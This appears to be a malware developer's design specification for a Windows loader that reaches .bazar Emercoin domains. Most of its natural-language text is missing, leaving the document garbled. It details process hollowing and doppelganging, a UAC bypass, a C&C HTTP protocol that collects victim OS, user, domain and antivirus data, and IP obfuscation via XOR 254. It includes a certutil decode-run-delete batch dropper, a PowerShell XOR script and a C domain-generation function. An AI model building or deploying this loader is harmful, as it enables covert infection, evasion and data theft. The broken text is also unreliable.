 
 

   ,   :
-   ( -   100)
-     Windows   Windows 2008/Windows Vista
       (js, powershell v2.0),     C/C++
-     ,       UAC

"" ,         ,    .
  ,          - .
   -    .

        ,     .
         (  18, . .).
              ( .     - ).

 :
-     ,      (   , ,  , .)
-   ,      
-          
-     ,  .  - XOR 1 ,  -   UTC   YYYYMMdd,   hex
  20200128 -  hex- 3230323030313238 (    16- )
     UTC,          
-     ,        
-    fileless- - process hollowing, process doppelganging,    dll  ,   ,
   ,    
-    

             
  .

     ,    ,     
(process hollowing/process doppelganging)     .

     .dll:
-      ,     .
  ,    .dll -  DllMain(DLL_PROCESS_ATTACH)

     ,        (inetcpl.cpl ->  ->  -).

,   :
-   .bazar  Emercoin       
-  .     ,   .       ( )
(       HEAD /update HTTP/1.1   X-Tag)

        .exe-.
      -   .exe-  ,   ,
 WMI .
,    :
-         :
 .txt-,  , ,     , .cab-, 
-  ,     
-   .exe,  bootstrap- (.bat-),     
     .exe   
- bootstrap-     ""  

 (   ,    ), bootstrap.bat:

@echo off
REM    ""
certutil -decode file.crt file.exe
REM  
file.exe
REM      
ping -n 300 127.0.0.1 > NUL
REM  , ..       
del /f /y file.exe

             .

   /++,    CMake,         Microsoft ,
 mingw, clang.


 

                   .
     SinkHole        .

 HTTP-   HTTP-      , :
Date: YYYY-MM-dd HH:mm:ss

*  
 HTTP-    Set-Cookie:    SID    base64-.
      ( !)

*  
      HTTP- .
      ,   .
        (     ,   ,
 DPI-   ).

   ,   ( )    ,   .

          .
  ,          .
          .

  .


 

           ,      .

1.   HTTP-     Date      
2.  /      .      
3. /     (  "Date: "       ),   base64  ,
     .
 Cookie,   -       X-     (.. ,    ).
4.    ,     .


  C&C   

      :
1.  "" IP-
2. -   ()  Emercoin
3.        (   .bazar)
  .3  ,        ,
        ,
           ( - ).
   .
   3      5000    .
     1.
    1..3,         .

          (.).
  ,  .

          3  ,   ,     
(  ).

  IP-   Emercoin,   IP-   XOR 254   .
, 124.245.101.251 (  DNS-) -> 130.11.155.5
.. DNS-  ,         DNS- .

  ipxor.ps1  PowerShell:
$ip = read-host -prompt "Enter IP";
write-host $ip;
$newip = '';
($ip.split('.') | foreach {
    $octet = [byte] ( $_)
    $octet = $octet -bxor 254;
    $newip = -join($newip,'.',$octet);
}
)
write-host $newip;


 

HEAD / HTTP/1.1
 
    X-Tag,   ,     .
 ,           .

GET / HTTP/1.1

     .
 - XOR 1 ,  -   UTC   YYYYMMdd,   hex
  20200128 -  hex- 3230323030313238 (    16- )

POST / HTTP/1.1

     GET,     .
        .

  .     !

    POST     .
 -       ,    !   .
  :
path=      (    fileless )
os=3-7   major-version, minor-version  build  ,     
(,  6.1 build 7600   617600).
os[1]=   (W=Windows)   
os[2]= 
arch= (): 86  64
cname= 
uname= 
domain=         WinAPI,  NetWkstaGetInfo;    !)
av[]= 
ps= 




 : https://habr.com/ru/post/425177/
  Emercoin .

 1
     

   ,    ,        .
  s .bazar

void get_possible_domain(char* domain) {
    if (!domain)
        return;

    for (int i = 0; i < 6; ++i) {
        int rndchr = rand() % ('z' - 'a');
        rndchr /= i + 6;
        char c = 'a' + rndchr + i*2;
        domain[i] = c;
    }

    static char datebuf[24];
    static char date[7];
    static bool date_computed = false;

    if (!date_computed) {
        GetDateFormatA(LOCALE_INVARIANT, 0, NULL, NULL, datebuf, sizeof(datebuf));
        char mon[3];
        char year[5];

        for (int i = 0; i < 2; ++i)
            mon[i] = datebuf[i];
        mon[2] = 0;

        for (int i = 0; i < 4; ++i)
            year[i] = datebuf[i + 6];
        year[4] = 0;
        sprintf_s(date, sizeof(date), "%.2d%d", 12 - atoi(mon), atoi(year) - 18);
        date_computed = true;
    }

    for (int i = 6; i < 12; ++i) {
        domain[i] = domain[i - 6] + date[i - 6] - '0';
        if (domain[i] < 'a')
            domain[i] = 'z';
    }

    domain[12] = 0;
}
